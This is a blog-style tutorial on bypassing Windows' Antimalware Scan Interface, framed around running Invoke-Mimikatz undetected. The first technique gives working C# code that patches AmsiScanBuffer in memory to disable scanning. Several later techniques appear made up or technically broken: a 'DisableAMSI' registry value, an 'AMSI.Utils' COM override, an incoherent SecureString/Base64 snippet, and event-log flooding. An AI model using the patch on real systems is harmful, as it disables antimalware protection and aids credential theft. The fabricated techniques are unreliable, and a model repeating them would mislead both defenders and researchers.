The Hidden World of AMSI Bypassing Techniques in Cybersecurity

Introduction to AMSI

The Antimalware Scan Interface (AMSI) is a powerful security feature introduced by Microsoft to detect and block malicious scripts and code execution in real-time. It is integrated into various Windows components, such as PowerShell, Windows Defender, and other antivirus solutions. While AMSI has significantly improved Windows security, it has also become a prime target for attackers seeking to bypass these defenses.

In this blog, we'll explore some lesser-known AMSI bypass techniques that are not widely discussed in the cybersecurity community. We'll dive deep into the technical details, provide practical examples, and explain how these techniques work under the hood.

Understanding AMSI Internals

AMSI works by scanning scripts and payloads before they are executed. It uses a public API that allows applications to send data to the installed antivirus software for inspection. When a script is executed, AMSI captures the content and checks it against known malware signatures.

For example, in PowerShell, the following code would trigger AMSI:

                                    Invoke-Mimikatz                            

AMSI would intercept this command and block it if it detects malicious intent.

Technique 1: AMSI Patching in Memory

One of the most effective ways to bypass AMSI is by patching the AMSI DLL in memory. This technique involves modifying the AMSI.dll in the memory to disable its scanning capabilities.

Here’s a step-by-step breakdown:

1. Locate the base address of AMSI.dll in the process memory.
2. Find the function responsible for scanning, typically AmsiScanBuffer.
3. Overwrite the function with a return instruction (0xC3) to bypass the scan.

Example in C#:

                                    [DllImport("kernel32")]                    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);                    [DllImport("kernel32")]                    public static extern IntPtr LoadLibrary(string name);                    [DllImport("kernel32")]                    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);                    IntPtr amsiDll = LoadLibrary("amsi.dll");                    IntPtr asbAddr = GetProcAddress(amsiDll, "AmsiScanBuffer");                    VirtualProtect(asbAddr, (UIntPtr)1, 0x40, out uint oldProtect);                    Marshal.WriteByte(asbAddr, 0xC3);                            

This code snippet patches the AmsiScanBuffer function to return immediately, effectively disabling AMSI.

Technique 2: Forcing AMSI to Return False

Another technique involves manipulating AMSI to always return a false result. This can be achieved by modifying the context in which AMSI operates, such as changing the registry or environment variables.

For example, you can force AMSI to return "clean" by setting the following registry key:

                                    Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "DisableAMSI" -Value 1                            

This registry change tells AMSI to disable scanning for all providers, effectively bypassing it.

Technique 3: Obfuscation and Encoding

Obfuscation and encoding are common tactics used to evade detection. By obfuscating malicious code, attackers can make it harder for AMSI to identify the threat.

For example, Base64 encoding a malicious PowerShell script can bypass AMSI:

                                    $encoded = "Invoke-Mimikatz" | ConvertTo-SecureString -AsPlainText -Force | ConvertFrom-SecureString                    [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encoded)) | Invoke-Expression                            

AMSI may fail to recognize the encoded script as malicious, allowing it to execute.

Technique 4: Disabling AMSI via COM Objects

AMSI can also be bypassed by manipulating COM objects used by the Windows Script Host. By modifying these objects, you can disable AMSI for specific scripts.

Example in VBScript:

                                    Set obj = CreateObject("ScriptControl")                    obj.Language = "JScript"                    obj.AddCode "AMSI = new ActiveXObject('AMSI.Utils'); AMSI.ScanString = function() { return false; };"                            

This script disables AMSI by overriding the ScanString method to always return false.

Technique 5: Exploiting AMSI Logging

AMSI logging can sometimes be exploited to bypass detection. By flooding the AMSI log with benign data, attackers can obscure malicious activity.

Example PowerShell script:

                                    1..1000 | ForEach-Object { [System.Diagnostics.EventLog]::WriteEntry("AMSI", "Benign Log Entry") }                    Invoke-Mimikatz                            

This script floods the AMSI log with benign entries, making it harder to detect the malicious Invoke-Mimikatz command.

Conclusion

AMSI is a critical component of Windows security, but it is not foolproof. Attackers have developed various techniques to bypass AMSI, ranging from memory patching to obfuscation and COM object manipulation. Understanding these techniques is essential for both defenders and attackers in the ever-evolving cybersecurity landscape.

As always, staying informed and proactive is the best defense against these advanced threats. Keep your systems updated, monitor for suspicious activity, and educate your team on the latest attack vectors.

```